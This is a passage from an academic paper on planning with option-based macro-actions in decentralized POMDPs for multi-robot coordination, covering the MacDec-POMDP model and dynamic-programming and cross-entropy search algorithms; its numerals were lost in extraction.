charpillet, ; oliehoek, spaan, amato, & whiteson, ; dibangoye, amato, buffet, & charpillet, ), but most approaches that scale well make very strong assumptions about the domain (e.g., assuming a large amount of independence between agents) (dibangoye, amato, doniec, & charpillet, ; melo & veloso, ; nair, varakantham, tambe, & yokoo, ) and/or have no guarantees about solution quality (oliehoek, whiteson, & spaan, ; seuken & zilberstein, b; velagapudi, varakantham, sycara, & scerri, ). one reason for this intractability is that actions are modeled as primitive (low-level) operations that last exactly one time step. the length of a single step can be adjusted (trading off solution quality for horizon length), but is always assumed to be the same for all agents. this allows synchronized action selection, but also requires reasoning about action selection and coordination at every time step. in single-agent (i.e., mdp) domains, hierarchical approaches to learning and planning (barto & mahadevan, ), exemplified by the options framework (sutton, precup, & singh, ), have explored using higher-level, temporally extended macro-actions (or op- tions ) to represent and solve problems, leading to significant performance improvements in planning (silver & ciosek, ; sutton et al., ). we now extend these ideas to the multi-agent case by introducing a dec-pomdp formulation with macro-actions modeled as options. the primary technical challenge here is that decision-making is no longer syn- chronized: each agent’s options must be selected, and may complete, at different times. to permit coordination, agents must use their knowledge of option policies to reason about the progress of other agents and their impact on the world. the use of macro-actions in the multi-agent case can incorporate the benefits of the single agent case, such as simpler and more efficient modeling of real systems (e.g., robots with actions that execute predefined controllers) (stone, sutton, & kuhlmann, ), more efficient planning (sutton et al., ), skill transfer (konidaris & barto, ), and skill- specific abstractions (konidaris & barto, ; dietterich, ). additional benefits can be gained by exploiting known structure in the multi-agent problem. for instance, in some cases macro-actions may only depend on locally observable information. one example is a robot navigating to a waypoint in a security patrol application. only local information is required for navigation, but choosing which waypoint to navigate to next requires reason- ing about the location and state of all the other robots. macro-actions with independent execution allow coordination decisions to be made only when necessary (i.e., when choosing macro-actions) rather than at every time step. furthermore, macro-actions can build on other macro-actions, allowing hierarchical planning. the resulting macro-action formulation allows asynchronous decision-making using actions with varying time durations. we therefore focus on the case where the agents are given local options that depend only on information locally observable to the agent during execution. our results show that high-quality solutions can be found for a typical dec-pomdp benchmark as well as large problems that traditional dec-pomdp methods cannot solve: a four agent meeting-in-a- modeling and planning with macro-actions in decentralized pomdps grid problem and a domain based on robots navigating among movable obstacles (stilman & kuffner, ). our macro-action-based methods can scale well in terms of the problem horizon and domain variables, but do not directly target scalability in terms of the number of agents (although such extensions are possible in the future). incorporating macro-actions into dec-pomdps results in a scalable algorithmic framework for generating solutions for a wide range of probabilistic multi-agent systems. one important application area for our approach is multi-robot systems. for single robots, automatic planning systems provide a flexible general-purpose strategy for con- structing plans given high-level declarative domain specifications, even in the presence of substantial stochasticity and partial observability (thrun, burgard, & fox, ). by in- corporating macro-actions into dec-pomdps, we show that this strategy can be effectively extended to multi-robot systems: our methods naturally bridge dec-pomdps and multi- robot coordination, allowing principled decentralized methods to be applied to real domains. to solidify this bridge, we describe a process for creating a multi-robot macro-action dec- pomdp (macdec-pomdp) model, solving it, and using the solution to produce a set of executable smach (bohren, ) finite-state machine task controllers. our methods al- low automatic off-line construction of robust multi-robot policies that support coordinated actions—including generating communication strategies that exploit the environment to share information critical to achieving the group’s overall objective. . background we now describe the dec-pomdp and options frameworks, upon which our work is based. . decentralized partially-observable markov decision processes dec-pomdps (bernstein et al., ) generalize pomdps (kaelbling, littman, & cas- sandra, ) and mdps (puterman, ) to the multi-agent, decentralized setting. as depicted in figure , dec-pomdps model a team of agents that must cooperate to solve some task by receiving local observations and individually selecting and executing actions over a sequence of time steps. the agents share a single reward function that specifies their objective, but which is not typically observed during execution. execution is decentralized because each agent must select its own action at each time step, without knowledge of the actions chosen or observations received by the other agents. finally, the problem is partially observable because, while the formalism assumes that there exists a markovian state at each time step, the agents do not have access to it. instead, each agent receives a separate observation at each time step, which reflects its own partial and local view of the world. more formally, a dec-pomdp is defined by a tuple 〈i,s,{ai},t,r,{Ωi},o,h〉, where: • i is a finite set of agents. • s is a finite set of states with designated initial state distribution b . • ai is a finite set of actions for each agent i with a = ×iai the set of joint actions. . pomdps are dec-pomdps where there is only one agent or the decision-making by the agents is centralized. . mdps are pomdps where the state is fully observable. amato, konidaris, kaelbling & how environment a o an on r figure : an n-agent dec-pomdp. each agent i receives observatoons oi and executes actions ai; all agents receive a single collective reward r. • t is a state transition probability function, t : s ×a×s → [ , ], that specifies the probability of transitioning from state s ∈ s to s′ ∈ s when actions ~a ∈ a are taken by the agents. hence, t(s,~a,s′) = pr(s′|~a,s). • r is a reward function: r : s × a → r, giving the immediate reward for being in state s ∈ s and taking actions ~a ∈ a. • Ωi is a finite set of observations for each agent, i, with Ω = ×iΩi the set of joint observations. • o is an observation probability function: o : Ω × a × s → [ , ], the probability of the agents receiving observations ~o ∈ Ω given actions ~a ∈ a were taken which results in state s′ ∈ s. hence o(~o,~a,s′) = pr(~o|~a,s′). • h is the number of steps until the problem terminates, called the horizon. note that while the actions and observations are factored with one factor per agent, the state—which represents the state of the whole system—need not be. the solution to a dec-pomdp is a joint policy —a set of policies, one for each agent. in an mdp, a solution policy is represented directly as a mapping from states to actions. in partially observed settings, the agents do not have access to the state, and so must represent policies some other way. in pomdp settings it is typically possible to calculate the belief state—a probability distribution over the unobserved state—and represent the agent’s policy as a mapping from belief state to actions. however, this is not possible in the dec-pomdp setting, because each agent would need access to the histories of all the other agents to calculate a (centralized) belief state. we therefore represent the history of each agent explicitly: the action-observation history for agent i, hai = (a i ,o i , . . . ,a t i,o t i), represents the actions taken and observations received at each step (up to step t); the set of such histories for agent i is hai . each agent’s policies are then a function of the agent’s history, and are either represented as a policy tree, where the vertices indicate actions to execute and the edges indicate transitions conditioned on an observation, or as a finite state controller which executes in a similar manner. an example of each is given in figure . the value of a joint policy, π, from state s is v π(s) = e [ h− ∑ t= γtr(~at,st)|s,π ] , modeling and planning with macro-actions in decentralized pomdps a a a a a o o o o o o a a (a) o o o o a a (b) figure : a single agent’s policy represented as (a) a policy tree and (b) a finite-state controller with initial state shown with a double circle. which represents the expected value of the immediate reward for the set of agents summed for each step of the problem given the action prescribed by the policy until the horizon is reached. in the finite-horizon case (which we consider in this paper), the discount factor, γ, is typically set to . an optimal policy beginning at state s is π∗(s) = argmaxπ v π(s). the goal is to maximize the total cumulative reward, beginning at some initial distribution over states b . dec-pomdps have been widely studied and there are number of significant advances in algorithms (e.g., see recent surveys amato et al., ; oliehoek, ; oliehoek & amato, ). unfortunately, optimal (and boundedly optimal) methods (amato et al., ; bernstein, amato, hansen, & zilberstein, ; aras et al., ; boularias & chaib- draa, ; dibangoye et al., ; oliehoek et al., ) do not scale to large problems and approximate methods (oliehoek et al., ; seuken & zilberstein, b; velagapudi et al., ; wu, zilberstein, & chen, a; wu, zilberstein, & jennings, ) do not scale or perform poorly as problem size (including horizon) grows. subclasses of the full dec- pomdp model have been explored, but they make strong assumptions about the domain (e.g., assuming a large amount of independence between agents) (dibangoye et al., ; melo & veloso, ; nair et al., ). the key question is then: how can scalability with respect to horizon and domain variables be achieved while making minimal (and accurate) assumptions about the problems being solved? our solution to this question is the use of hierarchy in dec-pomdps. while many hierarchical approaches have been developed for multi-agent systems (e.g., horling & lesser, ), very few are applicable to multi-agent models based on mdps and pomdps. in this paper, the hierarchy will take the form of options replacing each agent’s primitive actions. the result is a general framework for asynchronous decision making operating at multiple levels of granularity that fits many real-world problems. as a result, we target scalability with respect to the problem horizon an domain variables (actions, observations and states), but leave scalability with respect to the number of agents to future work (e.g., by combining the methods from this paper with those that scale in terms of the number of agents). amato, konidaris, kaelbling & how figure : a multi-robot warehouse domain. . multi-robot domains our work is motivated by multi-robot coordination domains. consider the multi-robot warehousing problem (shown in figure ) that we present in the experiments. a team of robots is tasked with finding a set of large and small boxes in the environment and returning them to a shipping location. large boxes require multiple robots to push. as a result, coordination is necessary not just for assigning robots to push specific boxes, but also because two robots are required to cooperate to push the larger box at the same time. there is stochasticity in the movements of robots and partial observability with respect to the location of the boxes and other robots: both can be only be detected when they are within range. we also consider cases where the robots can send communication signals to each other, but we do not define the meaning of the messages. therefore, our planner must determine where the robots should navigate, what boxes they should push and what communication messages should be sent (if any) at each step of the problem to optimize the solution for the team. the robots must make these decisions based solely on the information they individually receive during execution (e.g., each robot’s estimate of its own location as well as where and when boxes and other robots have been seen). this multi-robot warehousing problem can be formalized as a dec-pomdp. in fact, any problem where multiple robots share a single overall reward or cost function can be formulated as a dec-pomdp. therefore, a dec-pomdp solver could potentially automat- ically generate control policies (including policies over when and what to communicate) for very rich decentralized control problems, in the presence of uncertainty. unfortunately, this generality comes at a cost: as mentioned above, dec-pomdps are typically infeasible to solve except for very small problems (bernstein et al., ). by contrast, we will show that by considering macro-actions, we retain the ability to coordinate while allowing high- quality solutions to be generated for significantly larger problems than would have been possible using other dec-pomdp-based methods. in this example, macro-actions could . in fact, there is a common dec-pomdp benchmark that can be thought of as a simple version of a warehouse problem (seuken & zilberstein, a). modeling and planning with macro-actions in decentralized pomdps be navigating to a small or large box, pushing a box (alone or with another robot) to a destination, or communicating with another robot. macro-actions are a natural model for the modular controllers often sequenced to obtain robot behavior. the macro-action approach leverages expert-designed or learned controllers for solving subproblems (e.g., navigating to a waypoint or grasping an object), bridging the gap between traditional robotics research and work on dec-pomdps. this approach has the potential to produce high-quality general solutions for real-world heterogeneous multi-robot coordination problems by automatically generating control and communication policies. . the options framework the options framework (sutton et al., ) provides methods for learning and planning using high-level actions, or options, in markov decision processes. in that setting, an option is defined by a tuple: m = (βm,im,πm), consisting of a stochastic termination condition, βm : s → [ , ], which determines the probability with which an option ceases to execute in each state; an initiation set, im ⊂ s, which determines whether or not an option can be executed from a state; and a stochastic option policy, πm : s ×a → [ , ], that maps states to action execution probabilities. an option describes a policy that an agent can choose to execute from any state in im, which results in the execution of policy πm until execution ceases according to βm. the set of options is termed m. for example, in the warehouse example above, an option-based macro-action may be navigating to a waypoint. in that case, the initiation set may be all states (it is available anywhere), the option policy may be a policy that navigates the robot to the waypoint location from any location and the termination condition may be the state that represents the waypoint location or a set of states within a given radius of the waypoint. there may also be terminal states for failure to reach the waypoint (e.g., states representing the robot getting stuck). the resulting problem is known as a semi-markov decision process, or smdp (sutton et al., ). note that we can create an option for a single-step action a by defining πm(s,a) = βm(s) = ,∀s, and im = s. the option framework therefore generalizes the traditional mdp setting. the goal is to generate a (possibly stochastic) policy, µ : s×m → [ , ], that selects an appropriate option given the current state. the bellman equation for the smdp is: v µ(s) = ∑ m µ(s,m) [ r(s,m) + ∑ s′ p(s′|s,m)v µ(s′) ] , where p(s′|s,m) = ∑∞ k= p m s (s ′,k)γk with pms (s ′,k) representing the probability that option m will terminate in state s′ from state s after k steps and r(s,m) is an expectation over discounted rewards until termination e[r t + γrt+ + . . . + γk− rt+k] (for executing option m starting at time t and terminating at time t + k). if the option-policies and the lower-level mdp is known, these quantities can be calculated from the underlying models. if these quantities are not known, learning can be used to generate a solution. amato, konidaris, kaelbling & how when the state is partially observable, these ideas can be directly transferred to the pomdp case. this can be done by representing the pomdp as a belief-state mdp. that is, given a current belief state, b, and a policy of option-based macro-actions, µ, the value can be calculated as: v µ(b) = ∑ m µ(b,m) [ r(b,m) + ∫ b′ p(b′|b,m)v µ(b′) ] , where µ(b,m) now selects a policy based on the belief state, r(b,m) = ∑ s b(s)r(s,m) and p(b′|b,m) = ∑∞ k= p m b (b ′,k)γk with pmb (b ′,k) representing the probability that option m will terminate in belief state b′ from belief b after k steps. several pomdp methods have been developed that use option-based macro-actions (theocharous & kaelbling, ; he, brunskill, & roy, ; lim, sun, & hsu, ). using either of these approaches directly is not possible in a decentralized multi-agent setting. first, the centralized information (a state or belief state) that prior approaches use for high-level action selection is not present during execution in the dec-pomdp setting. consequently, the action selection function, µ, must be reformulated for the decentralized case. second, in the multi-agent case the inclusion of temporally extended actions means that action selection is no longer synchronized across agents—some agents’ options would terminate while others are still executing. therefore, it is not clear when macro-actions should be considered complete (i.e., up to which point rewards and transitions should be calculated), which complicates the definition of the reward and transition functions, r and p. we now introduce a framework that addresses these issues, thereby enabling the use of options in the dec-pomdp setting. . adding options to dec-pomdps we extend the dec-pomdp model by replacing the local actions available to each agent with option-based macro-actions. specifically, the action set of each agent i, which is denoted ai above, is replaced with a finite set of options mi. then, m = ×imi the set of joint options, replacing a, the joint set of actions. we focus on local options for each agent i, each of which is defined by a tuple: mi = (βmi,imi,πmi), where βmi : h a i → [ , ] is a stochastic termination condition; imi ⊂ h m i is the initiation set; and πmi : h a i × ai → [ , ] is the option policy. note that h a i is agent i’s primitive action-observation history, while hmi is agent i’s macro-action-macro-observation history (or option history, which is formally defined below). the different histories allow the agents to locally maintain the necessary information to know how to execute and terminate macro- actions (based on low-level actions and observations, typically beginning when an option is first executed) and initiate them (based on high-level history information that is maintained over a longer timeframe). such local options model systems where the execution of a particular option, once selected, does not require coordination between agents, but can instead be completed by the agent on its own. decision making that enables coordination between agents need only happen at the level of which option to execute, rather than inside modeling and planning with macro-actions in decentralized pomdps the options themselves. of course, other (non-local) forms of options that control and depend on multiple agents are possible, but we discuss the local form due to its simplicity and generality. the macro-actions for the warehouse problem are discussed in . . , but, in short, macro-actions can be defined for navigation, pushing and communication. for example, there are macro-actions for navigating to each room that could contain boxes. for these macro-actions, the initiation set is all observations (they are available everywhere), the policy navigates the robot to the specified room using low-level observation information that is available to that robot (using low-level observation histories) and the termination condition consists of observations that are only possible inside the desired room (localization information within the room). . the macdec-pomdp model we will refer to dec-pomdps with such macro-actions as macdec-pomdps. in the macdec-pomdp, the agent and state spaces remain the same as in the dec-pomdp defi- nition, but macro-actions and macro-observations are added. formally, a macdec-pomdp is a tuple 〈i,s,{mi},{ai},t,r,{zi},{Ωi},ζi,o,h〉, where: • i, s, {ai}, t , r, {Ωi}, o and h are the same as the dec-pomdp definition (and represent the ‘underlying’ dec-pomdp), • mi is a finite set of macro-actions for each agent i with m = ×imi the set of joint macro-actions, • ζi is a finite set of macro-observations for each agent, i, with ζ = ×iζi the set of joint macro-observations, • zi is a macro-observation probability function for agent i: zi : ζi×mi×s → [ , ], the probability of the agent receiving macro-observation zi ∈ ζi given macro-action mi ∈ mi has completed and the current state is s ′ ∈ s. hence zi(zi,mi,s′) = pr(zi|mi,s′). note that the macro-observations are assumed to be independently generated for each agent after that agent’s macro-action has completed. this is reasonable since macro-action com- pletion is asynchronous (making it uncommon that multiple macro-actions terminate at the same time) and are generated based on the underlying state (which could include informa- tion about the other agents). in the macdec-pomdp, we will not attempt to directly represent the transition and reward functions, but instead infer them by using the underlying dec-pomdp model or a simulator . that is, because we assume either a model or a simulator of the underlying dec-pomdp is known, we can evaluate policies using macro-actions in the underlying dec-pomdp by either knowing that underlying dec-pomdp model or having a simulator that implements such a model. this evaluation using the dec-pomdp model or simulator can be thought of as ‘unrolling’ each agent’s macro-action and when any macro-action completes, selecting an appropriate next macro-action for that agent. as a result, a formal representation of higher-level transition and reward models is not necessary. . in related work based on the ideas in this paper, we do generate such an explicit model that considers time until completion for any macro-action, resulting in the semi-markovian dec-posmdp (omidshafiei, agha-mohammadi, amato, & how, ). amato, konidaris, kaelbling & how . designing macro-observations in the macdec-pomdp, macro-observations are assumed to be given or designed. de- termining the set of macro-actions that provides the necessary information, without un- necessarily adding problem variables remains an open question (as it is in the primitive observation case). in general, the high-level macro-observations can consist of any finite set for each agent, but some natural representations exist. for instance, the macro-observation may just be the particular terminal condition that was reached (e.g., the robot entered office # ). a lot of information is lost in this case, so macro-observations can also be action-observation histories, representing all the low-level information that took place during macro-action execution. when action-observation histories are used, initiation conditions of macro-actions can depend on the histories of macro-actions already taken and their re- sults. option policies and termination conditions will generally depend on histories that begin when the macro-action is first executed (action-observation histories). while defining the ‘best’ set of macro-observations is an open problem, there is some work on choosing them and learning the macro-observation probability functions (omidshafiei, liu, everett, lopez, amato, liu, how, & vian., a). in this paper, we assume they are defined based on the underlying state (as defined above). the macro-observation probability function can be adapted to depend on terminal conditions or local observations rather than states. . macdec-pomdp solutions solutions to macdec-pomdps map from option histories to macro-actions. an option history, which includes the sequence of macro-observations seen and macro-actions selected, is defined as hmi = (z i ,m i , . . . ,z t− i ,m t i). here, z i may be a null macro-observation or an initial macro-observation produced from the initial belief state b . note that while histories over primitive actions provide the number of steps that have been executed (because they include actions and observations at each step), an option history typically requires many more (primitive) steps to execute than the number of macro-actions listed. we can then define policies for each agent, µi, for choosing macro-actions that depend on option histories. a (stochastic) local policy, µi : h m i × mi → [ , ] then depends on these option histories and a joint policy for all agents is written as µ. the evaluation of such policies is more complicated than the dec-pomdp case because decision-making is no longer synchronized. in cases when a model of macro-action execution (e.g., the option policy) and the underlying dec-pomdp are available we can evaluate the high-level policies in a similar way to other dec-pomdp-based approaches. given a joint policy, the primitive action at each step is determined by the (high-level) policy, which chooses the macro-action, and the macro-action policy, which chooses the (primitive) action. this ‘unrolling’ uses the underlying dec-pomdp to generate (primitive) transitions and rewards, but determines what actions to take from the macro-actions. the joint high-level and macro-action policies can then be evaluated as: v µ(s) = e [ h− ∑ t= γtr(~at,st)|s,π,µ ] . when the underlying dec-pomdp and the macro-action policies are not available, we can use a simulator or a high-level model to execute the policies and return samples of the modeling and planning with macro-actions in decentralized pomdps relevant values. simulation is very similar to model-based evaluation, but uses monte carlo estimation as discussed in section . for example, we can evaluate a joint -agent policy µ which begins with macro-actions m and m at state s and executes for t steps as: v µ t (m ,m ,s) = ∑ o ,o o(o ,o ,a ,a ,s) ∑ a ,a πm (o ,a )πm (o ,a ) [ r(a ,a ,s)+ ∑ s′ t(s′,a ,a ,s) ∑ o′ ,o ′ o(o′ ,o ′ ,a ,a ,s ′) ( βm (o ′ )βm (o ′ ) ∑ m′ ,m ′ µ (o ′ ,m ′ )µ (o ′ ,m ′ )v µ t− (s ′,m′ ,m ′ ) (both terminate) + βm (o ′ ) ( −βm (o ′ ) )∑ m′ µ (o ′ ,m ′ )v µ t− (m ′ ,m ,s ′) (agent terminates) + ( −βm (o ′ ) ) βm (o ′ ) ∑ m′ µ (o ′ ,m ′ )v µ t− (m ,m ′ ,s ′) (agent terminates) + ( −βm (o ′ ) )( −βm (o ′ ) ) v µ t− (m ,m ,s ′) )] , (neither terminates) where single observations are used instead of longer histories for macro-action policies, π, and termination conditions, β. for simplicity, we also use observations based on the current state, o(o ,o ,a ,a ,s), rather than the next state. the example can easily be extended to consider histories and the other observation function (as well as more agents). also, note that macro-actions will be chosen from the policy over macro-actions µ based on the option history, which is not shown explicitly (after termination of a macro-action, a high-level macro-observation will be generated and the next specified macro-action will be chosen as described above). note that agents’ macro-actions may terminate at different times; the appropriate action is then chosen by the relevant agent’s policy and evaluation continues. because we are interested in a finite-horizon problem, we assume evaluation continues for h (primitive) steps. given that we can evaluate policies over macro-actions, we can then compare these policies. we can define a hierarchically optimal policy µ∗(s) = argmaxµv µ(s) which defines the highest-valued policy among those that use the given macdec-pomdp. because a hierarchically optimal policy may not include all possible history-dependent policies, it may have lower value than the optimal policy for the underlying dec-pomdp (the globally optimal policy ). a globally optimal policy can be guaranteed by including the primitive actions in the set of macro-actions for each agent and mapping the primitive observation function to the macro-observation function, because the same set of policies can be created from this primitive macro-action set as would be created in the underlying dec-pomdp. however, . unlike flat dec-pomdps, stochastic policies may be beneficial in the macro-action case because full agent histories are no longer used. this remains an area of future work. amato, konidaris, kaelbling & how m m (a) step m m m z z m m m z z m m m z z m z m m m z z m z (b) step of dp figure : policies for a single agent after (a) one step and (b) two steps of dynamic pro- gramming using macro-actions m and m and macro-observations z (some of which are not possible after executing a particular macro-action). this typically makes little sense, because it is at least as hard as planning in the underlying dec-pomdp directly. . algorithms because dec-pomdp algorithms produce policies mapping agent histories to actions, they can be extended to consider macro-actions instead of primitive actions by adjusting policy evaluation and keeping track of macro-action progress and termination. we discuss how macro-actions can be incorporated into three such algorithms; extensions can also be made to other approaches. in these cases, deterministic polices are generated which are represented as policy trees (as shown in figure ). a policy tree for each agent defines a policy that can be executed based on local information. the root node defines the macro-action to choose in the known initial state, and macro-actions are specified for each legal macro-observation of the root macro-action (as seen in figure (b)). in the figure, macro-observations that are not shown are not possible after the given macro-action has completed. execution continues until the primitive horizon h is reached, meaning some nodes of the tree may not be reached due to the differing execution times of some macro-actions. such a tree can be evaluated up to a desired horizon using the policy evaluation given above (i.e., evaluation using the underlying dec-pomdp model or simulator). all the methods we discuss use some form of search through the policy space to generate high-quality macro-action-based policies. . dynamic programming a simple exhaustive search method can be used to generate hierarchically optimal determin- istic policies which use macro-actions. this algorithm is similar in concept to the dynamic programming algorithm used in dec-pomdps (hansen, bernstein, & zilberstein, ), but full evaluation and pruning (removing dominated policies) are not used at each step (since these cannot naturally take place in the macro-action setting). instead we can exploit the structure of macro-actions to reduce the space of policies considered. due to the inspira- tion from dynamic programming for finite-horizon dec-pomdps (hansen et al., ), we retain the name for the algorithm, but our algorithm is not a true dynamic programming modeling and planning with macro-actions in decentralized pomdps algorithm option-based dynamic programming (o-dp) : function optiondecdp(h) : t ← : primitivehorizonbelowh ← true : mt ←∅ : repeat : mt+ ←exhaustivebackup(mt) : primitivehorizonbelowh ←testpolicysetslength(mt+ ) : t ← t + : until primitivehorizonbelowh = false : return mt : end function algorithm as a full evaluation is not conducted and built on at every step (as discussed below). we can exhaustively generate all combinations of macro-actions by first considering each agent using any single macro-actions to solve the problem, as seen for one agent with two macro-actions (m and m ) in figure (a). we can test all combinations of these - macro-action policies for the set of agents to see if they are guaranteed to reach (primitive) horizon h (starting from the initial state). if any combination of policies does not reach h with probability , we will not have a valid policy for all steps. therefore, an exhaustive backup is performed by considering starting from all possible macro-actions and then for any legal macro-observation of the macro-action (represented as z in the figure), transitioning to one of the -macro-action policies from the previous step (see figure (b)). this step creates all possible next (macro-action) step policies. we can check again to see if any of the current set of policies will terminate before the desired horizon and continue to grow the policies (exhaustively as described above) as necessary. when all policies are sufficiently long, all combinations of these policies can be evaluated as above (by flattening out the polices into primitive action dec-pomdp policies, starting from some initial state and proceeding until h). the combination with the highest value at the initial state, s , is chosen as the (hierarchically optimal) policy. pseudocode for this approach is given in algorithm . here, mt represents the set of (joint) macro-action policies generated for t (macro-action) steps. exhaustivebackup performs the generation of all possible next-step policies for each agent and testpolicyset- slength checks to see if all policies reach the given horizon, h. primitivehorizonbelowh represents whether there is any tree that has a primitive horizon less than h. the algorithm continues until all policies reach h and the final set of policies mt can be returned for evaluation. this algorithm will produce a hierarchically optimal deterministic policy because it constructs all legal deterministic macro-action policies that are guaranteed to reach hori- zon h. this follows from the fact that macro-actions must last at least one step and all combinations of macro-actions are generated at each step until it can be guaranteed that additional backups will cause redundant policies to be generated. our approach represents exhaustive search in the space of legal policies that reach a desired horizon. as such it is amato, konidaris, kaelbling & how not a true dynamic programming algorithm, but additional ideas from dynamic program- ming for dec-pomdps (hansen et al., ) can be incorporated. for instance, we could prune policies based on value, but this would require evaluating all possible joint policies at every state after each backup. this evaluation would be very costly as the policy would be flattened after each backup and all combinations of flat policies would be evaluated for all states for all possible reachable horizons. instead, beyond just scaling in the horizon due to the macro-action length, another benefit of our approach is that only legal policies are generated using the initiation and terminal conditions for macro-actions. as seen in figure (b), macro-action m has two possible terminal states while macro-action m has three. furthermore, macro-actions are only applicable given certain initial conditions. for example, m may not be applicable after observing z and m may not be applicable after z . this structure limits the branching factor of the policy trees produced and thus the number of trees considered. . memory-bounded dynamic programming memory-bounded dynamic programming (mbdp) (seuken & zilberstein, b) can also be extended to use macro-actions as shown in algorithm . mbdp is similar to the dynamic programming method above, but only a finite number of policy trees are retained (given by parameter maxtrees ) after each backup. after an exhaustive backup has been performed (in either dp or mbdp), at most |mi|×|mi,t− ||ζi| new trees for each agent i given the previous policy set mi,t− is generated (although it will often be much less since many macro-actions may not be possible after a given macro-observation). the key addition in mbdp is that, next, a subset of t-step trees, m̂t, is chosen by evaluating the full set of trees, mt, at states that are generated by a heuristic policy (hpol in the algorithm). the heuristic policy is executed for the first h−t− steps of the problem. heuristic policies can include centralized mdp or pomdp policies or random policies (or a combination of these), providing a set of possible states to consider at that depth. a set of maxtrees states is generated and the highest valued trees for each state are kept. this process of exhaustive backups and retaining maxtrees trees continues, using shorter and shorter heuristic policies until the all combinations of the retained trees reach horizon h. again, the set of trees with the highest value at the initial state is returned. this approach is potentially suboptiomal because a fixed number of trees are retained, and tree sets are optimized over states that are both assumed to be known and may never be reached. nevertheless, since the number of policies retained at each step is bounded by maxtrees, mbdp has time and space complexity linear in the horizon. as a result, mbdp and its extensions (amato et al., ; kumar & zilberstein, ; wu et al., a) have been shown to perform well in many large dec-pomdps. the macro-action-based extension of mbdp uses the structure provided by the initiation and terminal conditions . the original mbdp algorithm (seuken & zilberstein, b) uses beliefs rather than states at lines and of the algorithm. our algorithm could similarly use beliefs, but we discuss using states for simplicity. . note that h is a primitive (underlying dec-pomdp) horizon, while t is a macro-action step. while backups will often result in increasing policy length by more than one primitive step, we conservatively use one step here, but recognize that more accurate calculations along with corresponding better state estimates are possible. modeling and planning with macro-actions in decentralized pomdps algorithm option-based memory bounded dynamic programming (o-mbdp) : function optionmbdp(maxtrees,h,hpol) : t ← : primitivehorizonbelowh ← true : mt ←∅ : repeat : mt+ ←exhaustivebackup(mt) : m̂t+ ←∅ : for all k ∈ maxtrees do : sk ← generatestate(hpol,h− t− ) : µ̂t+ ←m̂t+ ∪ arg maxµt+ ∈mt+ v µt+ (sk) : end for : t ← t + : mt ←m̂t+ : primitivehorizonbelowh ←testpolicysetslength(mt) : until primitivehorizonbelowh = false : return mt : end function as in the dynamic programming approach in algorithm , but does not have to produce all policies that will reach horizon h as the algorithm no longer is seeking hierarchical optimality. scalability can therefore be adjusted by reducing the maxtrees parameter (although solution quality may be reduced). . direct cross entropy policy search another method for solving dec-pomdps that has been effective is a cross entropy method, called dice (for direct cross entropy) (oliehoek, kooi, & vlassis, ). instead of using dynamic programming, this method searches through the space of policy trees by sampling. that is, it maintains sampling distributions (the probability of choosing an action) at each history of each agent. policies are sampled based on these distributions and the resulting joint policies are evaluated. a fixed number of best-performing policies are retained and the sampling distributions are updated based on the action choice frequency of these policies (mixed with the current distributions). policy sampling and distribution updates continue for a fixed number of iterations (or a convergence test such as one based on kl-divergence). the macro-action version of dice is described in algorithm . the inputs are the number of iterations of the algorithm (iter), the number of joint policies to sample at each iteration, n, the number of joint policies used for updating the sampling distributions, nb, the learning rate, α, and the (primitive) horizon, h. the best value, vbest, is initialized to negative infinity and the sampling distributions are typically initialized to uniform action distributions. in the macro-action case, sampling distributions that are based on option histories are used instead of primitive histories. specifically, we maintain ξh m i (m) for each option history hmi , of each agent, i, which represents the probability of selecting macro-action m after that agent observes history hmi . the algorithm then begins with an empty set amato, konidaris, kaelbling & how algorithm option-based direct cross entropy policy search (o-dice) : function optiondice(iter,n,nb,α,h) : vbest ←−∞ : ξ ←initialdistribution : for all i ∈ iter do : m←∅ : for n ← to n do : µ ← sample(ξ) : m←m∪{µ} : v ← v µ(s ) : if v > vbest then : vbest ← v : µbest ← µ : end if : end for : mbest ←keepbestpols(m,nb) : ξnew ← update(ξ) : ξnew ← αξnew + ( −α)ξ : ξ ← ξnew : end for : return µbest : end function of joint policies, m, and samples n policies for each agent. because macro-actions often have limited initial and terminal conditions, sampling is more complicated. it is done in a top down fashion from the first macro-action until the (primitive) horizon is reached, while taking into account the possible macro-observations after starting from the initial state and executing the policy to that point. this allows both the terminal conditions and initial sets to be used to create distributions over valid macro-actions based on the previous histories. these n policies for each agent are evaluated and the if a new best policy is found, the value and policy are stored in vbest and µbest. the policies with the nb highest values from the n are stored in mbest and ξnew is updated for each agent’s histories with ξ hmi new(m) = /nb ∑ µ∈mbest i(πi,h m i ,m) where i(µi,h m i ,m) is an indicator variable that is when macro-action m is taken by policy µi after history h m i . this ξnew is mixed with the previous distribution, ξ, based on the learning rate, α, and the process continues until the number of iterations is exhausted. the best joint policy, µbest can then be returned. . simulation-based execution in macdec-pomdps the macdec-pomdp framework is a natural way to represent and generate behavior for realistic general problems such as multi-robot systems, but requiring full knowledge of both the high-level macro-action model and the low-level dec-pomdp model is often impracti- cal. to use the macdec-pomdp model as described above, we would assume an abstract model of the system is given in the form of macro-action representations, which include modeling and planning with macro-actions in decentralized pomdps the associated policies as well as initiation and terminal conditions. these macro-actions are controllers operating in (possibly) continuous time with continuous (low-level) actions and feedback, but their operation is discretized for use with the planner. this discretiza- tion represents an underlying discrete dec-pomdp which consists of the primitive actions, states of the system, and the associated rewards. while the complexity of macdec-pomdp solution methods primarily depends on the size of the macdec-pomdp model, and not the size of the underlying dec-pomdp (as only policies over macro-actions are needed with execution in the underlying dec-pomdp being fixed), it is often difficult to generate and represent a full dec-pomdp model for real-world systems. we therefore extend this model to use a simulator rather than a full model of the problem, as shown in figure . in many cases, a simulator already exists or is easier to construct than the full model. our planner still assumes the set of macro-actions and macro- observations are known, but the policies of the macro-actions as well as the underlying dec-pomdp are not explicitly known. instead, we make the more realistic assumption that we can simulate the macro-actions in an environment similar to the real-world domain. as such, our proposed algorithms for generating policies over macro-actions remain the same (since constructing policies of macro-actions only requires knowledge of the set of macro-actions and their initiation and terminal conditions), but all evaluation is conducted in the simulator (through sampling) rather than through enumerating all reachable states to compute the bellman equation. that is, by using policy search, we can decouple the process of finding solutions with the process of evaluating them. as a result, we assume the macro-action and macro-observation sets are discrete, but the underlying state, action and observation spaces can be continuous. op#mized  controllers  for  each  robot   (in  smach  format)   system  descrip#on   (macro-­‐ac#ons,  dynamics,  sensor  uncertainty,  rewards/costs)   planner   (solving  the  macdec-­‐pomdp)   figure : a high level system diagram for multi-robot problems where the system can be described formally or using a simulator, solutions are generated with our planning methods and the output is a set of controllers, one for each robot. specifically, a fixed policy can be evaluated by monte carlo sampling starting at an initial state (or belief state), choosing an action for each agent according to the policy, sampling an observation from the system, updating the current position in the policy (i.e., the current node in each agent’s policy tree) and then continuing this process until some maximum time step 